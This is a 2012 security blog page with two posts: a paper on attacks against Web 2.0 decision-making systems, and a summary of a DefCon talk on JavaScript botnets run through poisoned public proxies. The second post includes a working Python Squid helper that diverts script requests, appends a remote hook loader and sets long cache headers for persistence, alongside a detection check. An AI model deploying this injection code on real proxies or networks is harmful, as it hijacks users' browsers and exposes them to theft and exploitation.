Friday, August 17, 2012

Raising Risk Awareness on the Adoption of Web 2.0 Technologies in Decision Making Processes

Today I'd like to share a paper that Marco Prandini and I wrote on the use of Web 2.0 in decision making processes. The paper can be found here, in the journal Future Internet.

Abstract: In the recent past, the so-called “Web 2.0” became a powerful tool for decision making processes. Politicians and managers, seeking to improve participation, embraced this technology as if it simply were a new, enhanced version of the World Wide Web, better suited to retrieve information, opinions and feedback from the general public on subjects like laws, acts and policies. This approach was often naive, neglecting the less-obvious aspects of the technology, and thus bringing on significant security problems. This paper shows how, in the end, the result could easily be the opposite of what was desired. Malicious attackers, in fact, could quite easily exploit the vulnerabilities in these systems to hijack the process and lead to wrong decisions, also causing the public to lose trust in the systems themselves.


Web 2.0 is for sure a great opportunity and an amazing paradigm that could be very useful for politicians and, more broadly, for decision makers. However, as described in the paper, Web 2.0 could be very dangerous if used to attack a decision chain. The paper describes, with examples, how a possible attacker could attack current political decisions by exploiting simple and well-known Web 2.0 bugs. I recommend this reading to all of you involved in politics and/or decision making, in addition to everybody who works for government agencies.

Tuesday, August 7, 2012

JavaScript and Botnets

After a long period spent traveling and moving to a new city, I am finally back on my blog. I'm not sure about the frequency of my future posts, but I'm still very interested in keeping on posting about my work topics ;). Probably I'll be able to post a little bit more from now on... Most of you are already aware of DefCon 2012 and its new security topics, so I won't spend time on that discussion, but I do want to point out an interesting technical paper presented by Chema Alonso and Manu "The Sur", titled "Owning Bad Guys {& Mafia} with JavaScript Botnets".

The paper describes how attackers, by exploiting the TOR network and publicly available proxies, can intercept users' traffic and inject malicious JavaScript to exploit users' browsers. The technique per se has been well known for years, and the framework they used to load malicious payloads (BeEF) is already widely used in the hacking community. So what's so interesting about this paper if it does not introduce any new concept? I found the analysis of the users they had really interesting: in other words, who is using publicly available proxies and TOR networks.

Let's take a deeper look at it. The following image shows the general idea of the attack as implemented on a proxy server (by the way, they set up a Squid proxy and then registered it on public proxy lists).

Squid can modify traffic following specific rules: each requested URL is handed to an external helper (Squid's url_rewrite_program), which returns the URL Squid should fetch instead. Originally this mechanism was designed for parental control and for blocking specific domains, but from a malicious perspective it can be used to inject malicious JavaScript into the pages users download. The authors used a poison script plugged into this mechanism, so that requests for JavaScript files were answered with copies carrying the malicious payload. Following the infection:
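Here is a small Python model of the injection step, added as an illustration and not the authors' poison script: it mimics a Squid url_rewrite_program helper that diverts JavaScript requests to a local "poison" server, shows what such a server appends to the fetched file, and includes the check a defender could run on a script fetched through an untrusted proxy. The helper line format (classic Squid 3.x: URL, client, user, method), the poison-server and hook URLs, and the cache headers are assumptions; the request lines are constructed.

```python
"""Model of a Squid url_rewrite_program helper used to poison JavaScript.

Added example, not the poison script from the talk. Assumes the classic
Squid 3.x helper protocol: one request per line on stdin,
    URL client_ip/fqdn user method [kv-pairs]
and one reply per line on stdout with the URL Squid should fetch.
"""
import sys
from urllib.parse import quote, urlsplit

POISON_SERVER = "http://127.0.0.1:8080/poison"  # hypothetical local server
HOOK_URL = "http://127.0.0.1:3000/hook.js"       # hypothetical BeEF-style hook

SAMPLE_REQUESTS = [  # constructed helper input lines
    "http://www.example.com/js/jquery.min.js 10.0.0.5/- - GET",
    "http://www.example.com/index.html 10.0.0.5/- - GET",
    "http://www.example.com/js/analytics.js 10.0.0.6/- - POST",
]


def wants_javascript(url):
    """True when the URL path names a JavaScript file (the injection target)."""
    return urlsplit(url).path.lower().endswith(".js")


def rewrite_line(line):
    """Handle one helper request line; return the URL Squid should fetch."""
    fields = line.strip().split()
    if not fields:
        return ""
    url = fields[0]
    method = fields[3].upper() if len(fields) > 3 else "GET"
    if method == "GET" and wants_javascript(url):
        # Divert to the poison server, which fetches the real file,
        # appends the hook loader and serves the result.
        return f"{POISON_SERVER}?u={quote(url, safe='')}"
    return url  # unchanged: Squid fetches the original


HOOK_SNIPPET = (
    "\n;(function(){var s=document.createElement('script');"
    "s.src='%s';document.head.appendChild(s);})();\n"
)


def poison_js(original_js, hook_url=HOOK_URL):
    """What the poison server does to the fetched file: the original code is
    kept intact so the page keeps working, then a loader for the hook is
    appended."""
    return original_js.rstrip("\n") + HOOK_SNIPPET % hook_url


POISON_HEADERS = {
    # Assumed choice: long-lived cache headers so the poisoned copy stays in
    # the browser cache after the victim stops using the proxy.
    "Content-Type": "application/javascript",
    "Cache-Control": "public, max-age=31536000",
}


def looks_poisoned(js, hook_url=HOOK_URL):
    """Defender-side check: does a fetched script load the hook URL?"""
    return hook_url in js and "createElement('script')" in js


if __name__ == "__main__":
    # Run as a Squid helper: one reply line per request line.
    for raw in sys.stdin:
        print(rewrite_line(raw), flush=True)
```

A practical check against this class of proxy is to fetch the same script directly and through the proxy and compare hashes; any difference, not only the loader pattern above, means the proxy is tampering with content.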

Again, I don't see any interesting technique in this, BUT I do see the beauty of this study in capturing the "stakeholders". If you keep reading the paper, the authors show who used this proxy and what they did with it. Obviously most of the operations performed through the free (and booby-trapped) proxy had malicious intent. One of the most interesting pieces of evidence the authors provide is about scams, and about the people who answered back by giving away personal information.

Most of the stakeholders come from the former USSR, Brazil and the USA. Many of them are from China, and only a few from Europe. Beyond the usual statistics on where users come from, understanding how malicious hackers use proxies to attack is really interesting. Another small but significant theoretical brick could be added to all the knowledge we have from the Honeynet Project.